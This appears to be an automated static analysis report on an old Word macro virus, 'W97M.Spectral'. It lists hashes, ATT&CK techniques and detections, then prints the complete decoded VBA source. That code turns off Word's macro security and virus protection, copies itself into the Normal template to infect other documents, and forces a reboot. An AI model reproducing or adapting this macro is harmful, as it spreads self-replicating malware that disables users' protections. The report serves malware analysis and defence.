Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 689a1ca65537856d…

MALICIOUS

Office (OLE)

Size: 143.5 KB
Created: 1999-07-24 02:57:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f362531bdd049633c15546db8bf2d038
SHA-1: 64bd7e62829d16d79af7265b27ff7995cebc6d94
SHA-256: 689a1ca65537856dccaeae8b58bbe9befa937038795fa133d336c0b38b5dbaf7
Risk Score: 188

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros, specifically a Document_Open macro that executes upon opening the document. This macro attempts to export its own code to 'C:\Av.log' and then import it into the Normal template, indicating an attempt to establish persistence or load additional functionality. The presence of ShellExecute API calls and the ClamAV detection of 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Spectral-1' strongly suggest malicious intent, likely to download and execute a second-stage payload.

Heuristics (4)

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer
    Private Sub Document_Open()
    ' W97M.Spectral by Draconia

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3700 bytes
SHA-256: 6a17eb67f5a478ec2f3ffc3df94d4e10716df5b9f332542bf9ac8c7ed9937286
Detection: ClamAV: Doc.Trojan.Spectral-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Declare Function ExitWindowsEx Lib "User32" (ByVal fuOptions As Integer, ByVal Reserved As Integer) As Boolean
Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer
Private Sub Document_Open()
' W97M.Spectral by Draconia
' Member of Virus Quest
' Copyright@1999
On Error GoTo ErrorDcOe:
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
iMacroNormalDotCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroNormalDotCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "Spectral" Then
        DropScreamInstalled = -1
    End If
Next i
If Not SpectralInstalled Then
    ActiveDocument.VBProject.VBComponents("Spectral").Export "C:\Av.log"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
    NormalTemplate.VBProject.VBComponents("Spectral").CodeModule.DeleteLines 1, 4
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") <> "Yes" Then
        System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") = "Yes"
        Call Payload
    End If
Else
iMacroActiveDctCount = ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroActiveDctCount
    If ActiveDocument.VBProject.VBComponents(i).Name = "Spectral" Then
        DropScreamDocInstalled = -1
    End If
Next i
If Not SpecDocInstalled Then
    NormalTemplate.VBProject.VBComponents("Spectral").Export "C:\Av.log"
    ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
    ActiveDocument.VBProject.VBComponents("Spectral").CodeModule.DeleteLines 1, 4
    ActiveDocument.Save
    With Assistant.NewBalloon
        .Button = msoButtonSetOK
        .Heading = "Tips:"
        .Text = "Get yourself a good quality Anti-Virus software!" & Chr(13) & "Thanks to F-Prot, AVP, NAV, McAffee, Dr Solomon!!!"
        .Show
    End With
End If
End If
ErrorDcOe:
End Sub
Private Sub Payload()
On Error GoTo ErrorPDSc
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
Const EWX_REBOOT As Integer = 2
Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "Microsoft Word"
    .Text = "Important:" & Chr(13) & "Becareful, you must reboot your PC, now! I'm outta here!"
    .Show
End With

ExitWindowsEx EWX_REBOOT, 0
ErrorPDSc:
End Sub